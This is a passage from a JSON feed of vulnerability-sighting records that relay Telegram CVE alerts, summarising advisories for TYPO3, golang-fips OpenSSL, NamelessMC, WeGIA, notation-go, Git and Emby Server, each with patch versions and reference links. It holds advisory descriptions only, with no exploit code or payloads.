https://pkg.go.dev/vuln/GO-2024-2660\n45. https://vuln.go.dev/ID/GO-2024-2660.json", "creation_timestamp": "2025-01-13T09:11:16.000000Z"}, {"uuid": "f014eb31-fce9-445f-a7f5-f8f6e248c4b4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-38X7-CC6W-J27Q", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/1758", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-55891\n\ud83d\udd39 Description: TYPO3 is a free and open source Content Management Framework. It has been discovered that the install tool password has been logged as plaintext in case the password hashing mechanism used for the password was incorrect. Users are advised to update to TYPO3 versions 13.4.3 ELTS which fixes the problem described. There are no known workarounds for this vulnerability.\n\ud83d\udccf Published: 2025-01-14T19:11:58.861Z\n\ud83d\udccf Modified: 2025-01-15T15:02:46.106Z\n\ud83d\udd17 References:\n1. https://github.com/TYPO3/typo3/security/advisories/GHSA-38x7-cc6w-j27q\n2. https://typo3.org/security/advisory/typo3-core-sa-2025-001", "creation_timestamp": "2025-01-15T15:10:06.000000Z"}, {"uuid": "ab226a21-71ad-412b-8453-9a2d5573026f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:4699", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/1356", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-1394\n\ud83d\udd39 Description: A memory leak flaw was found in Golang in the RSA encrypting/decrypting code, which might lead to a resource exhaustion vulnerability using attacker-controlled inputs\u200b. The memory leak happens in github.com/golang-fips/openssl/openssl/rsa.go#L113. The objects leaked are pkey\u200b and ctx\u200b. That function uses named return parameters to free pkey\u200b and ctx\u200b if there is an error initializing the context or setting the different properties. All return statements related to error cases follow the \"return nil, nil, fail(...)\" pattern, meaning that pkey\u200b and ctx\u200b will be nil inside the deferred function that should free them.\n\ud83d\udccf Published: 2024-03-21T12:16:38.790Z\n\ud83d\udccf Modified: 2025-01-13T08:35:31.150Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2024:1462\n2. https://access.redhat.com/errata/RHSA-2024:1468\n3. https://access.redhat.com/errata/RHSA-2024:1472\n4. https://access.redhat.com/errata/RHSA-2024:1501\n5. https://access.redhat.com/errata/RHSA-2024:1502\n6. https://access.redhat.com/errata/RHSA-2024:1561\n7. https://access.redhat.com/errata/RHSA-2024:1563\n8. https://access.redhat.com/errata/RHSA-2024:1566\n9. https://access.redhat.com/errata/RHSA-2024:1567\n10. https://access.redhat.com/errata/RHSA-2024:1574\n11. https://access.redhat.com/errata/RHSA-2024:1640\n12. https://access.redhat.com/errata/RHSA-2024:1644\n13. https://access.redhat.com/errata/RHSA-2024:1646\n14. https://access.redhat.com/errata/RHSA-2024:1763\n15. https://access.redhat.com/errata/RHSA-2024:1897\n16. https://access.redhat.com/errata/RHSA-2024:2562\n17. https://access.redhat.com/errata/RHSA-2024:2568\n18. https://access.redhat.com/errata/RHSA-2024:2569\n19. https://access.redhat.com/errata/RHSA-2024:2729\n20. https://access.redhat.com/errata/RHSA-2024:2730\n21. https://access.redhat.com/errata/RHSA-2024:2767\n22. https://access.redhat.com/errata/RHSA-2024:3265\n23. https://access.redhat.com/errata/RHSA-2024:3352\n24. https://access.redhat.com/errata/RHSA-2024:4146\n25. https://access.redhat.com/errata/RHSA-2024:4371\n26. https://access.redhat.com/errata/RHSA-2024:4378\n27. https://access.redhat.com/errata/RHSA-2024:4379\n28. https://access.redhat.com/errata/RHSA-2024:4502\n29. https://access.redhat.com/errata/RHSA-2024:4581\n30. https://access.redhat.com/errata/RHSA-2024:4591\n31. https://access.redhat.com/errata/RHSA-2024:4672\n32. https://access.redhat.com/errata/RHSA-2024:4699\n33. https://access.redhat.com/errata/RHSA-2024:4761\n34. https://access.redhat.com/errata/RHSA-2024:4762\n35. https://access.redhat.com/errata/RHSA-2024:4960\n36. https://access.redhat.com/errata/RHSA-2024:5258\n37. https://access.redhat.com/errata/RHSA-2024:5634\n38. https://access.redhat.com/errata/RHSA-2024:7262\n39. https://access.redhat.com/security/cve/CVE-2024-1394\n40. https://bugzilla.redhat.com/show_bug.cgi?id=2262921\n41. https://github.com/golang-fips/openssl/commit/85d31d0d257ce842c8a1e63c4d230ae850348136\n42. https://github.com/golang-fips/openssl/security/advisories/GHSA-78hx-gp6g-7mj6\n43. https://github.com/microsoft/go-crypto-openssl/commit/104fe7f6912788d2ad44602f77a0a0a62f1f259f\n44. https://pkg.go.dev/vuln/GO-2024-2660\n45. https://vuln.go.dev/ID/GO-2024-2660.json", "creation_timestamp": "2025-01-13T09:11:16.000000Z"}, {"uuid": "970ee983-c633-4d1e-91a4-1ca47429a81d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-9Q22-W64P-G8QM", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/1369", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-22142\n\ud83d\udd39 Description: NamelessMC is a free, easy to use &amp; powerful website software for Minecraft servers. In affected versions an admin can add the ability to have users fill out an additional field and users can inject javascript code into it that would be activated once a staffer visits the user's profile on staff panel. As a result an attacker can execute javascript code on the staffer's computer. This issue has been addressed in version 2.1.3 and all users are advised to upgrade. There are no known workarounds for this vulnerability.\n\ud83d\udccf Published: 2025-01-13T19:56:59.869Z\n\ud83d\udccf Modified: 2025-01-13T19:56:59.869Z\n\ud83d\udd17 References:\n1. https://github.com/NamelessMC/Nameless/security/advisories/GHSA-9q22-w64p-g8qm\n2. https://github.com/NamelessMC/Nameless/releases/tag/v2.1.3", "creation_timestamp": "2025-01-13T20:07:11.000000Z"}, {"uuid": "214d5b97-b0b9-4eea-85ff-a0ff893b7204", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-45V3-38PC-874V", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/1419", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-56138\n\ud83d\udd39 Description: notion-go is a collection of libraries for supporting sign and verify OCI artifacts. Based on Notary Project specifications. This issue was identified during Quarkslab's audit of the timestamp feature. During the timestamp signature generation, the revocation status of the certificate(s) used to generate the timestamp signature was not verified. During timestamp signature generation, notation-go did not check the revocation status of the certificate chain used by the TSA. This oversight creates a vulnerability that could be exploited through a Man-in-The-Middle attack. An attacker could potentially use a compromised, intermediate, or revoked leaf certificate to generate a malicious countersignature, which would then be accepted and stored by `notation`. This could lead to denial of service scenarios, particularly in CI/CD environments during signature verification processes because timestamp signature would fail due to the presence of a revoked certificate(s) potentially disrupting operations. This issue has been addressed in release version 1.3.0-rc.2 and all users are advised to upgrade. There are no known workarounds for this vulnerability.\n\ud83d\udccf Published: 2025-01-13T21:37:59.729Z\n\ud83d\udccf Modified: 2025-01-13T21:37:59.729Z\n\ud83d\udd17 References:\n1. https://github.com/notaryproject/notation-go/security/advisories/GHSA-45v3-38pc-874v\n2. https://github.com/notaryproject/notation-go/commit/e7005a6d13e5ba472d4e166fbb085152f909e102", "creation_timestamp": "2025-01-13T22:10:36.000000Z"}, {"uuid": "2af5cf52-2339-4b7e-a91c-304ec251860c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-FHPX-54CH-CCXH", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/1423", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-22613\n\ud83d\udd39 Description: WeGIA is an open source web manager with a focus on the Portuguese language and charitable institutions. A Stored Cross-Site Scripting (XSS) vulnerability was identified in the `informacao_adicional.php` endpoint of the WeGIA application. This vulnerability allows attackers to inject malicious scripts into the `descricao` parameter. The injected scripts are stored on the server and executed automatically whenever the affected page is accessed by users, posing a significant security risk. The application fails to properly validate and sanitize user inputs in the `informacao_adicional.php` parameter. This lack of validation allows attackers to inject malicious scripts, which are then stored on the server. Whenever the affected page is accessed, the malicious payload is executed in the victim's browser, potentially compromising the user's data and system. This issue has been addressed in version 3.2.6 and all users are advised to upgrade. There are no known workarounds for this vulnerability.\n\ud83d\udccf Published: 2025-01-13T20:59:10.478Z\n\ud83d\udccf Modified: 2025-01-14T00:31:18.399Z\n\ud83d\udd17 References:\n1. https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-fhpx-54ch-ccxh\n2. https://github.com/LabRedesCefetRJ/WeGIA/commit/d47412372d94dc3ca26e6416b8315895c61224fa", "creation_timestamp": "2025-01-14T01:07:28.000000Z"}, {"uuid": "e6aaeb82-1e5b-4f42-9b17-a37c75566827", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-R5PH-XG7Q-XFRP", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/1581", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-52006\n\ud83d\udd39 Description: Git is a fast, scalable, distributed revision control system with an unusually rich command set that provides both high-level operations and full access to internals. Git defines a line-based protocol that is used to exchange information between Git and Git credential helpers. Some ecosystems (most notably, .NET and node.js) interpret single Carriage Return characters as newlines, which renders the protections against CVE-2020-5260 incomplete for credential helpers that treat Carriage Returns in this way. This issue has been addressed in commit `b01b9b8` which is included in release versions v2.48.1, v2.47.1, v2.46.3, v2.45.3, v2.44.3, v2.43.6, v2.42.4, v2.41.3, and v2.40.4. Users are advised to upgrade. Users unable to upgrade should avoid cloning from untrusted URLs, especially recursive clones.\n\ud83d\udccf Published: 2025-01-14T18:39:52.748Z\n\ud83d\udccf Modified: 2025-01-14T18:52:11.014Z\n\ud83d\udd17 References:\n1. https://github.com/git/git/security/advisories/GHSA-r5ph-xg7q-xfrp\n2. https://github.com/git-ecosystem/git-credential-manager/security/advisories/GHSA-86c2-4x57-wc8g\n3. https://github.com/git/git/security/advisories/GHSA-qm7j-c969-7j4q\n4. https://github.com/git/git/commit/b01b9b81d36759cdcd07305e78765199e1bc2060", "creation_timestamp": "2025-01-14T19:10:45.000000Z"}, {"uuid": "58393ae4-b6ba-4fe3-8cc4-8eeea489b08f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-FFFJ-6FR6-3FGF", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/1214", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2023-33193\n\ud83d\udd39 Description: Emby Server is a user-installable home media server which stores and organizes a user's media files of virtually any format and makes them available for viewing at home and abroad on a broad range of client devices. This vulnerability may allow administrative access to an Emby Server system, depending on certain user account settings. By spoofing certain headers which are intended for interoperation with reverse proxy servers, it may be possible to affect the local/non-local network determination to allow logging in without password or to view a list of user accounts which may have no password configured. Impacted are all Emby Server system which are publicly accessible and where the administrator hasn't tightened the account login configuration for administrative users. This issue has been patched in Emby Server Beta version 4.8.31 and Emby Server version 4.7.12.\n\n\n\ud83d\udccf Published: 2023-05-30T05:24:58.192Z\n\ud83d\udccf Modified: 2025-01-10T19:48:24.089Z\n\ud83d\udd17 References:\n1. https://github.com/EmbySupport/security/security/advisories/GHSA-fffj-6fr6-3fgf", "creation_timestamp": "2025-01-10T20:07:09.000000Z"}, {"uuid": "7d3c1496-f5fa-4813-b27c-5392ed43cb21", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-8CP5-VR69-H8XX", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/1388", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-22617\n\ud83d\udd39 Description: WeGIA is an open source web manager with a focus on the Portuguese language and charitable institutions. A Reflected Cross-Site Scripting (XSS) vulnerability was identified in the `editar_socio.php` endpoint of the WeGIA application. This vulnerability allows attackers to inject malicious scripts in the `socio` parameter. The application fails to validate and sanitize user inputs in the `socio` parameter. This lack of validation permits the injection of malicious payloads, which are reflected back to the user's browser in the server's response and executed within the context of the victim's browser. This issue has been addressed in version 3.2.7 and all users are advised to upgrade. There are no known workarounds for this vulnerability.\n\ud83d\udccf Published: 2025-01-13T20:52:32.567Z\n\ud83d\udccf Modified: 2025-01-13T20:52:32.567Z\n\ud83d\udd17 References:\n1. https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-8cp5-vr69-h8xx\n2. https://github.com/LabRedesCefetRJ/WeGIA/commit/35d374736cec39082ed297bb3cd55fa6286050ad", "creation_timestamp": "2025-01-13T21:11:42.000000Z"}, {"uuid": "c49d2343-6cf3-492d-918e-62d25c05c63c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:1472", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/1356", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-1394\n\ud83d\udd39 Description: A memory leak flaw was found in Golang in the RSA encrypting/decrypting code, which might lead to a resource exhaustion vulnerability using attacker-controlled inputs\u200b. The memory leak happens in github.com/golang-fips/openssl/openssl/rsa.go#L113. The objects leaked are pkey\u200b and ctx\u200b. That function uses named return parameters to free pkey\u200b and ctx\u200b if there is an error initializing the context or setting the different properties. All return statements related to error cases follow the \"return nil, nil, fail(...)\" pattern, meaning that pkey\u200b and ctx\u200b will be nil inside the deferred function that should free them.\n\ud83d\udccf Published: 2024-03-21T12:16:38.790Z\n\ud83d\udccf Modified: 2025-01-13T08:35:31.150Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2024:1462\n2. https://access.redhat.com/errata/RHSA-2024:1468\n3. https://access.redhat.com/errata/RHSA-2024:1472\n4. https://access.redhat.com/errata/RHSA-2024:1501\n5. https://access.redhat.com/errata/RHSA-2024:1502\n6. https://access.redhat.com/errata/RHSA-2024:1561\n7. https://access.redhat.com/errata/RHSA-2024:1563\n8. https://access.redhat.com/errata/RHSA-2024:1566\n9. https://access.redhat.com/errata/RHSA-2024:1567\n10. https://access.redhat.com/errata/RHSA-2024:1574\n11. https://access.redhat.com/errata/RHSA-2024:1640\n12. https://access.redhat.com/errata/RHSA-2024:1644\n13. https://access.redhat.com/errata/RHSA-2024:1646\n14. https://access.redhat.com/errata/RHSA-2024:1763\n15. https://access.redhat.com/errata/RHSA-2024:1897\n16. https://access.redhat.com/errata/RHSA-2024:2562\n17. https://access.redhat.com/errata/RHSA-2024:2568\n18. https://access.redhat.com/errata/RHSA-2024:2569\n19. https://access.redhat.com/errata/RHSA-2024:2729\n20. https://access.redhat.com/errata/RHSA-2024:2730\n21. https://access.redhat.com/errata/RHSA-2024:2767\n22. https://access.redhat.com/errata/RHSA-2024:3265\n23. https://access.redhat.com/errata/RHSA-2024:3352\n24. https://access.redhat.com/errata/RHSA-2024:4146\n25. https://access.redhat.com/errata/RHSA-2024:4371\n26. https://access.redhat.com/errata/RHSA-2024:4378\n27. https://access.redhat.com/errata/RHSA-2024:4379\n28. https://access.redhat.com/errata/RHSA-2024:4502\n29. https://access.redhat.com/errata/RHSA-2024:4581\n30. https://access.redhat.com/errata/RHSA-2024:4591\n31. https://access.redhat.com/errata/RHSA-2024:4672\n32. https://access.redhat.com/errata/RHSA-2024:4699\n33. https://access.redhat.com/errata/RHSA-2024:4761\n34. https://access.redhat.com/errata/RHSA-2024:4762\n35. https://access.redhat.com/errata/RHSA-2024:4960\n36. https://access.redhat.com/errata/RHSA-2024:5258\n37. https://access.redhat.com/errata/RHSA-2024:5634\n38. https://access.redhat.com/errata/RHSA-2024:7262\n39. https://access.redhat.com/security/cve/CVE-2024-1394\n40. https://bugzilla.redhat.com/show_bug.cgi?id=2262921\n41. https://github.com/golang-fips/openssl/commit/85d31d0d257ce842c8a1e63c4d230ae850348136\n42. https://github.com/golang-fips/openssl/security/advisories/GHSA-78hx-gp6g-7mj6\n43. https://github.com/microsoft/go-crypto-openssl/commit/104fe7f6912788d2ad44602f77a0a0a62f1f259f\n44. https://pkg.go.dev/vuln/GO-2024-2660\n45. https://vuln.go.dev/ID/GO-2024-2660.json", "creation_timestamp": "2025-01-13T09:11:16.000000Z"}, {"uuid": "3af58e74-d07c-4c33-8f51-385ef40e53d4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:1897", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/1356", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-1394\n\ud83d\udd39 Description: A memory leak flaw was found in Golang in the RSA encrypting/decrypting code, which might lead to a resource exhaustion vulnerability using attacker-controlled inputs\u200b. The memory leak happens in github.com/golang-fips/openssl/openssl/rsa.go#L113. The objects leaked are pkey\u200b and ctx\u200b. That function uses named return parameters to free pkey\u200b and ctx\u200b if there is an error initializing the context or setting the different properties. All return statements related to error cases follow the \"return nil, nil, fail(...)\" pattern, meaning that pkey\u200b and ctx\u200b will be nil inside the deferred function that should free them.\n\ud83d\udccf Published: 2024-03-21T12:16:38.790Z\n\ud83d\udccf Modified: 2025-01-13T08:35:31.150Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2024:1462\n2. https://access.redhat.com/errata/RHSA-2024:1468\n3. https://access.redhat.com/errata/RHSA-2024:1472\n4. https://access.redhat.com/errata/RHSA-2024:1501\n5. https://access.redhat.com/errata/RHSA-2024:1502\n6. https://access.redhat.com/errata/RHSA-2024:1561\n7. https://access.redhat.com/errata/RHSA-2024:1563\n8. https://access.redhat.com/errata/RHSA-2024:1566\n9. https://access.redhat.com/errata/RHSA-2024:1567\n10. https://access.redhat.com/errata/RHSA-2024:1574\n11. https://access.redhat.com/errata/RHSA-2024:1640\n12. https://access.redhat.com/errata/RHSA-2024:1644\n13. https://access.redhat.com/errata/RHSA-2024:1646\n14. https://access.redhat.com/errata/RHSA-2024:1763\n15. https://access.redhat.com/errata/RHSA-2024:1897\n16. https://access.redhat.com/errata/RHSA-2024:2562\n17. https://access.redhat.com/errata/RHSA-2024:2568\n18. https://access.redhat.com/errata/RHSA-2024:2569\n19. https://access.redhat.com/errata/RHSA-2024:2729\n20. https://access.redhat.com/errata/RHSA-2024:2730\n21. https://access.redhat.com/errata/RHSA-2024:2767\n22. https://access.redhat.com/errata/RHSA-2024:3265\n23. https://access.redhat.com/errata/RHSA-2024:3352\n24. https://access.redhat.com/errata/RHSA-2024:4146\n25. https://access.redhat.com/errata/RHSA-2024:4371\n26. https://access.redhat.com/errata/RHSA-2024:4378\n27. https://access.redhat.com/errata/RHSA-2024:4379\n28. https://access.redhat.com/errata/RHSA-2024:4502\n29. https://access.redhat.com/errata/RHSA-2024:4581\n30. https://access.redhat.com/errata/RHSA-2024:4591\n31. https://access.redhat.com/errata/RHSA-2024:4672\n32. https://access.redhat.com/errata/RHSA-2024:4699\n33. https://access.redhat.com/errata/RHSA-2024:4761\n34. https://access.redhat.com/errata/RHSA-2024:4762\n35. https://access.redhat.com/errata/RHSA-2024:4960\n36. https://access.redhat.com/errata/RHSA-2024:5258\n37. https://access.redhat.com/errata/RHSA-2024:5634\n38. https://access.redhat.com/errata/RHSA-2024:7262\n39. https://access.redhat.com/security/cve/CVE-2024-1394\n40. https://bugzilla.redhat.com/show_bug.cgi?id=2262921\n41. https://github.com/golang-fips/openssl/commit/85d31d0d257ce842c8a1e63c4d230ae850348136\n42. https://github.com/golang-fips/openssl/security/advisories/GHSA-78hx-gp6g-7mj6\n43. https://github.com/microsoft/go-crypto-openssl/commit/104fe7f6912788d2ad44602f77a0a0a62f1f259f\n44. https://pkg.go.dev/vuln/GO-2024-2660\n45. https://vuln.go.dev/ID/GO-2024-2660.json", "creation_timestamp": "2025-01-13T09:11:16.000000Z"}, {"uuid": "662cdef5-70f3-47de-b616-efd74461deb7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:2562", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/1356", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-1394\n\ud83d\udd39 Description: A memory leak flaw was found in Golang in the RSA encrypting/decrypting code, which might lead to a resource exhaustion vulnerability using attacker-controlled inputs\u200b. The memory leak happens in github.com/golang-fips/openssl/openssl/rsa.go#L113. The objects leaked are pkey\u200b and ctx\u200b. That function uses named return parameters to free pkey\u200b and ctx\u200b if there is an error initializing the context or setting the different properties. All return statements related to error cases follow the \"return nil, nil, fail(...)\" pattern, meaning that pkey\u200b and ctx\u200b will be nil inside the deferred function that should free them.\n\ud83d\udccf Published: 2024-03-21T12:16:38.790Z\n\ud83d\udccf Modified: 2025-01-13T08:35:31.150Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2024:1462\n2. https://access.redhat.com/errata/RHSA-2024:1468\n3. https://access.redhat.com/errata/RHSA-2024:1472\n4. https://access.redhat.com/errata/RHSA-2024:1501\n5. https://access.redhat.com/errata/RHSA-2024:1502\n6. https://access.redhat.com/errata/RHSA-2024:1561\n7. https://access.redhat.com/errata/RHSA-2024:1563\n8. https://access.redhat.com/errata/RHSA-2024:1566\n9. https://access.redhat.com/errata/RHSA-2024:1567\n10. https://access.redhat.com/errata/RHSA-2024:1574\n11. https://access.redhat.com/errata/RHSA-2024:1640\n12. https://access.redhat.com/errata/RHSA-2024:1644\n13. https://access.redhat.com/errata/RHSA-2024:1646\n14. https://access.redhat.com/errata/RHSA-2024:1763\n15. https://access.redhat.com/errata/RHSA-2024:1897\n16. https://access.redhat.com/errata/RHSA-2024:2562\n17. https://access.redhat.com/errata/RHSA-2024:2568\n18. https://access.redhat.com/errata/RHSA-2024:2569\n19. https://access.redhat.com/errata/RHSA-2024:2729\n20. https://access.redhat.com/errata/RHSA-2024:2730\n21. https://access.redhat.com/errata/RHSA-2024:2767\n22. https://access.redhat.com/errata/RHSA-2024:3265\n23. https://access.redhat.com/errata/RHSA-2024:3352\n24. https://access.redhat.com/errata/RHSA-2024:4146\n25. https://access.redhat.com/errata/RHSA-2024:4371\n26. https://access.redhat.com/errata/RHSA-2024:4378\n27. https://access.redhat.com/errata/RHSA-2024:4379\n28. https://access.redhat.com/errata/RHSA-2024:4502\n29. https://access.redhat.com/errata/RHSA-2024:4581\n30. https://access.redhat.com/errata/RHSA-2024:4591\n31. https://access.redhat.com/errata/RHSA-2024:4672\n32. https://access.redhat.com/errata/RHSA-2024:4699\n33. https://access.redhat.com/errata/RHSA-2024:4761\n34. https://access.redhat.com/errata/RHSA-2024:4762\n35. https://access.redhat.com/errata/RHSA-2024:4960\n36. https://access.redhat.com/errata/RHSA-2024:5258\n37. https://access.redhat.com/errata/RHSA-2024:5634\n38. https://access.redhat.com/errata/RHSA-2024:7262\n39. https://access.redhat.com/security/cve/CVE-2024-1394\n40. https://bugzilla.redhat.com/show_bug.cgi?id=2262921\n41. https://github.com/golang-fips/openssl/commit/85d31d0d257ce842c8a1e63c4d230ae850348136\n42. https://github.com/golang-fips/openssl/security/advisories/GHSA-78hx-gp6g-7mj6\n43. https://github.com/microsoft/go-crypto-openssl/commit/104fe7f6912788d2ad44602f77a0a0a62f1f259f\n44. https://pkg.go.dev/vuln/GO-2024-2660\n45. https://vuln.go.dev/ID/GO-2024-2660.json", "creation_timestamp": "2025-01-13T09:11:16.000000Z"}, {"uuid": "675e5d36-a062-44e1-979d-8ba287dd6631", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:1646", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/1356", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-1394\n\ud83d\udd39 Description: A memory leak flaw was found in Golang in the RSA encrypting/decrypting code, which might lead to a resource exhaustion vulnerability using attacker-controlled inputs\u200b. The memory leak happens in github.com/golang-fips/openssl/openssl/rsa.go#L113. The objects leaked are pkey\u200b and ctx\u200b. That function uses named return parameters to free pkey\u200b and ctx\u200b if there is an error initializing the context or setting the different properties. All return statements related to error cases follow the \"return nil, nil, fail(...)\" pattern, meaning that pkey\u200b and ctx\u200b will be nil inside the deferred function that should free them.\n\ud83d\udccf Published: 2024-03-21T12:16:38.790Z\n\ud83d\udccf Modified: 2025-01-13T08:35:31.150Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2024:1462\n2. https://access.redhat.com/errata/RHSA-2024:1468\n3. https://access.redhat.com/errata/RHSA-2024:1472\n4. https://access.redhat.com/errata/RHSA-2024:1501\n5. https://access.redhat.com/errata/RHSA-2024:1502\n6. https://access.redhat.com/errata/RHSA-2024:1561\n7. https://access.redhat.com/errata/RHSA-2024:1563\n8. https://access.redhat.com/errata/RHSA-2024:1566\n9. https://access.redhat.com/errata/RHSA-2024:1567\n10. https://access.redhat.com/errata/RHSA-2024:1574\n11. https://access.redhat.com/errata/RHSA-2024:1640\n12. https://access.redhat.com/errata/RHSA-2024:1644\n13. https://access.redhat.com/errata/RHSA-2024:1646\n14. https://access.redhat.com/errata/RHSA-2024:1763\n15. https://access.redhat.com/errata/RHSA-2024:1897\n16. https://access.redhat.com/errata/RHSA-2024:2562\n17. https://access.redhat.com/errata/RHSA-2024:2568\n18. https://access.redhat.com/errata/RHSA-2024:2569\n19. https://access.redhat.com/errata/RHSA-2024:2729\n20. https://access.redhat.com/errata/RHSA-2024:2730\n21. https://access.redhat.com/errata/RHSA-2024:2767\n22. https://access.redhat.com/errata/RHSA-2024:3265\n23. https://access.redhat.com/errata/RHSA-2024:3352\n24. https://access.redhat.com/errata/RHSA-2024:4146\n25. https://access.redhat.com/errata/RHSA-2024:4371\n26. https://access.redhat.com/errata/RHSA-2024:4378\n27. https://access.redhat.com/errata/RHSA-2024:4379\n28. https://access.redhat.com/errata/RHSA-2024:4502\n29. https://access.redhat.com/errata/RHSA-2024:4581\n30. https://access.redhat.com/errata/RHSA-2024:4591\n31. https://access.redhat.com/errata/RHSA-2024:4672\n32. https://access.redhat.com/errata/RHSA-2024:4699\n33. https://access.redhat.com/errata/RHSA-2024:4761\n34. https://access.redhat.com/errata/RHSA-2024:4762\n35. https://access.redhat.com/errata/RHSA-2024:4960\n36. https://access.redhat.com/errata/RHSA-2024:5258\n37. https://access.redhat.com/errata/RHSA-2024:5634\n38. https://access.redhat.com/errata/RHSA-2024:7262\n39. https://access.redhat.com/security/cve/CVE-2024-1394\n40. https://bugzilla.redhat.com/show_bug.cgi?id=2262921\n41. https://github.com/golang-fips/openssl/commit/85d31d0d257ce842c8a1e63c4d230ae850348136\n42. https://github.com/golang-fips/openssl/security/advisories/GHSA-78hx-gp6g-7mj6\n43. https://github.com/microsoft/go-crypto-openssl/commit/104fe7f6912788d2ad44602f77a0a0a62f1f259f\n44. https://pkg.go.dev/vuln/GO-2024-2660\n45. https://vuln.go.dev/ID/GO-2024-2660.json", "creation_timestamp": "2025-01-13T09:11:16.000000Z"}, {"uuid": "124904e2-f5c1-47de-923c-6f076a8f0ad0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-78HX-GP6G-7MJ6", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/1356", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-1394\n\ud83d\udd39 Description: A memory leak flaw was found in Golang in the RSA encrypting/decrypting code, which might lead to a resource exhaustion vulnerability using attacker-controlled inputs\u200b. The memory leak happens in github.com/golang-fips/openssl/openssl/rsa.go#L113. The objects leaked are pkey\u200b and ctx\u200b. That function uses named return parameters to free pkey\u200b and ctx\u200b if there is an error initializing the context or setting the different properties. All return statements related to error cases follow the \"return nil, nil, fail(...)\" pattern, meaning that pkey\u200b and ctx\u200b will be nil inside the deferred function that should free them.\n\ud83d\udccf Published: 2024-03-21T12:16:38.790Z\n\ud83d\udccf Modified: 2025-01-13T08:35:31.150Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2024:1462\n2. https://access.redhat.com/errata/RHSA-2024:1468\n3. https://access.redhat.com/errata/RHSA-2024:1472\n4. 